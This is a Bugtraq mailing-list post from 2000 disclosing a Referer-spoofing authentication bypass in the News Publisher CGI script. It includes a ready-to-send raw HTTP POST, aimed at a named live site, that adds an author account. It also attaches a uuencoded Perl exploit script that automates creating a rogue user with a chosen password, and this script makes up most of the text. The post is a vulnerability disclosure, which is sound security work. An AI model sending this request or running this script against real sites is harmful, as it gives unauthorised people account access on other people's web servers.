Bugtraq mailing list archives
News Publisher CGI Vulnerability
From: n30 <n30 () CGI-EXPERTS COM>
Date: Tue, 29 Aug 2000 21:30:09 -0700
Product: News Publisher Versions: Tested v1.05, 1.05a, 1.05b and 1.06 (newest) OS: Unix and Winnt Vendor: Notified Web Site: www.gwscripts.com The Problem, yet again CGI authors use nested IF statements to decide what action to take upon and incoming request. This time the problem allows ppl to add and author into the 'authors.file' file. This can't be done through a web browser since the script assumes that if the HTTP_REFERER field is the url of the news.cgi script (the main script) then you must have completed the login process :). This assumtion would be true if you were to use a browser but.... its easily fixed using netcat therefore by passing this raw HTTP request: POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0 Connection: close User-Agent: n30/browser Host: www.speedy3d.com Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi Content-type: application/x-www-form-urlencoded Content-length: 71 author=n30&apassword=teapot&email=don () know com&name=n30&password=teapot it is possible to add an author. Exploit, I have included a perl script that will add a user into the authors.file for you with username: kid and the passwerd of your choice. Patch, I suspect it will be very quick in arriving.. Extra, This is a real problem since on older versions the author.file was readable with Unix crypt passes, this hole sorta blows that outta the water!. There are many sitez using this script and some would probably be regarded as large. Therefore i must ask you NOT to misuse the exploit script. thanx.... n30 n30 () alldas de begin 666 newpub-xploit.pl M(R$O=7-R+V)I;B]P97)L#0HC(" -"B,@3F5W<R!0=6)L:7-H97(@15A03$]) M5"!B>2!N,S -"B,@5F5R<VEO;G,Z('1E<W1E9"!O;B Q+C U#0HC"0D@(" @ M(" Q+C U80T*(PD)(" @(" @,2XP-6(-"B,@(" @(" @(" @( D@(" @(" Q M+C V#0HC($)U9R!&;W5N9"!">3H@;64@>VXS,'T-"B,@3U,Z(%5N:7@@86YD M(%=I;FYT#0HC#0HC(%1H92!0<F]B;&5M.@T*(PE4:&4@875T:&]R(&1E8VED M960@:6X@86QL(&AI<R G96YL:6=H=&5N960@=VES9&]M)PT*(R!T:&%T(&EF M('1H92!(5%107U)%1D5215(@=7)L(&ES('1H92!S86UE(&%S('1H92!.97=S M(%!U8FQI<VAE<@T*(R!N97=S+F-G:2!F:6QE+B!4:&5N(%4@:&%V92!/0E9) M3U533%D@;&]G9V5D(&EN/PT*(PT*(R!%>'!L;VET.@T*(PEH;6UM(&UE('1H M:6YK<R!I('-H;W5L9"!C:&%N9V4@=&AE($A45%!?4D5&15)%4B!T;SH-"B,- M"B,):'1T<#HO+W=W=RYS97)V97(N8V]M+V-G:2]N97=S+F-G:0T*(PT*(PE5 M<VEN9R!T:&ES(&5X<&QO:70@=VEL;"!A9&0@86X@875T:&]R(&%C8V]U;G0@ M=VET:"!U<V5R(&MI9 T*(PEA;F0@<&%S<W=E<F0@;V8@=7(@8VAO:6-E+@T* M(PT*(R!.3U1%.B!4:&5R92!A<F4@;6]R92!I;G9E;G1I=F4@=V%Y<R!T;R!U M<V4@=&AI<R!6=6QN97)A8FEL:71Y(#HI#0HC"6EE+B!M87EB93\_('1H92!! M9&UI;B!S8W)E96X@:7,@<')O=&5C=&5D(&)Y('1H92!(5%107U)%1D5215(_ M#0HC#0HC(&XS,$!A;&QD87,N9&4-"B,@=W=W+F%L;&1A<RYD92P@9&5F86-E M9"YA;&QD87,N9&4@>W1R:6(G<R!T:&4@=V5B;6%S=&5R(&YO="!M92%]#0HC M#0HC(%-H;W5T>CH@=')I8BP@87AE<W,L(&1O;7HL(&%C:61F;&%M92P@<F%X M:64L("!A;F0@86QL('=H;R!K;F]W(&UE(0T*(PT*#0IU<V4@<W1R:6-T.PT* M=7-E(%-O8VME=#L-"@T*<')I;G0H(EQN3F5W<R!0=6)L:7-H97(@15A03$]) M5%QN(BD[#0IP<FEN="@B0GDZ(&XS,"![;C,P7$!A;&QD87,N9&5]7&XB*3L- M"G!R:6YT*")<;E-H;W5T>CH@=')I8BP@87AE<W,L(&1O;7HL(&%C:61F;&%M M92P@<F%X:65<;B(I.PT*#0II9B H0$%21U8@/" S*2![#0H@(" @<')I;G0H M(EQN57-A9V4Z("0P(#QT87)G970^(#QD:7(^(#QN97=P87-S/EQN(BD[#0H@ M(" @<')I;G0H(EQN(" @96<@/3X@+B]S<&QO:70N<&P@=W=W+F5X86UP;&4N M8V]M(&-G:2UB:6XO;F5W<RYC9VD@:6ES86QA;65R7&XB*3L-"B @("!E>&ET M*#$I.PT*?0T*#0HH;7D@)'1A<F=E="QM>2 D9&ER+&UY("1N97=P87-S*2 ] M($!!4D=6.PT*#0HC(%-E='5P($-O;G1E;G0M3&5N9W1H($AE861E<B Z*0T* M;7D@)&QE;F=T:" ](#8X("L@*#(@*B!L96YG=&@H)&YE=W!A<W,I*3L-"@T* M(R!0<FEN="!"=6QL4VAI= T*<')I;G0H(EQN4F5M;W1E(&AO<W0Z("1T87)G M971<;B(I.PT*<')I;G0H(D-'22US8W)I<'0Z("1D:7)<;B(I.PT*<')I;G0H M(E523#H@:'1T<#HO+R1T87)G970O)&1I<EQN(BD[#0H-"B,@4V5T=7 @55), M($-O;6UA;F0-"FUY("1U<FP@/2 B875T:&]R/6MI9"9A<&%S<W=O<F0])&YE M=W!A<W,F96UA:6P];&%M97)Z7$!A;G1I;VYL:6YE+F-O;29N86UE/6MI9"9P M87-S=V]R9#TD;F5W<&%S<R([#0IP<FEN="@B55),($-O;6UA;F0Z("1U<FQ< M;B(I.PT*(R!.96-E<W-A<GD@=&\@1$4M2VED9&EE(&1A('=E<FQD(#HI#0IM M>2 D86=E;G0@/2 B+3U!='1E;G1I;VX@061M:6X]+2!P3'H@;C!T92!D,'=N M('1H,7,@25 @86YD(% T<W,@;VYT,"!F0FDB.PT*#0IM>2 D<W!L;VET/0T* M(E!/4U0@+R1D:7(_861D075T:&]R($A45% O,2XP#0I#;VYN96-T:6]N.B!C M;&]S90T*57-E<BU!9V5N=#H@)&%G96YT#0I(;W-T.B D=&%R9V5T#0I2969E M<F5R.B!H='1P.B\O)'1A<F=E="\D9&ER#0I#;VYT96YT+71Y<&4Z(&%P<&QI M8V%T:6]N+W@M=W=W+69O<FTM=7)L96YC;V1E9 T*0V]N=&5N="UL96YG=&@Z M("1L96YG=&@-"@T*)'5R;"([#0H-"FUY("1I861D<B ](&EN971?871O;B@D M=&%R9V5T*2 @(" @(" @(" @(" @(" @(" @('Q\(&1I92@B17)R;W(Z("0A M7&XB*3L-"FUY("1P861D<B ]('-O8VMA9&1R7VEN*#@P+" D:6%D9'(I(" @ M(" @(" @(" @(" @('Q\(&1I92@B17)R;W(Z("0A7&XB*3L-"FUY("1P<F]T M;R ](&=E='!R;W1O8GEN86UE*"=T8W G*2 @(" @(" @(" @(" @(" @('Q\ M(&1I92@B17)R;W(Z("0A7&XB*3L-"@T*<V]C:V5T*%-/0TM%5"P@4$9?24Y% M5"P@4T]#2U]35%)%04TL("1P<F]T;RD@(" @?'P@9&EE*")%<G)O<CH@)"%< M;B(I.PT*8V]N;F5C="A33T-+150L("1P861D<BD@(" @(" @(" @(" @(" @ M(" @(" @(" @?'P@9&EE*")%<G)O<CH@)"%<;B(I.PT*<V5N9"A33T-+150L M(B1S<&QO:71<,#$U7# Q,B(L(# I(" @(" @(" @(" @(" @?'P@9&EE*")% M<G)O<CH@)"%<;B(I.PT*8VQO<V4H4T]#2T54*3L-"@T*<')I;G0H(EQN5V@P M82!C:&5X,'(Z(&AT=' Z+R\D=&%R9V5T+R1D:7)<;G5S97(O<&%S<SH@:VED :+R1N97=P87-S7&XB*3L-"@T*97AI="@P*3L` ` end
Current thread:
- News Publisher CGI Vulnerability n30 (Aug 30)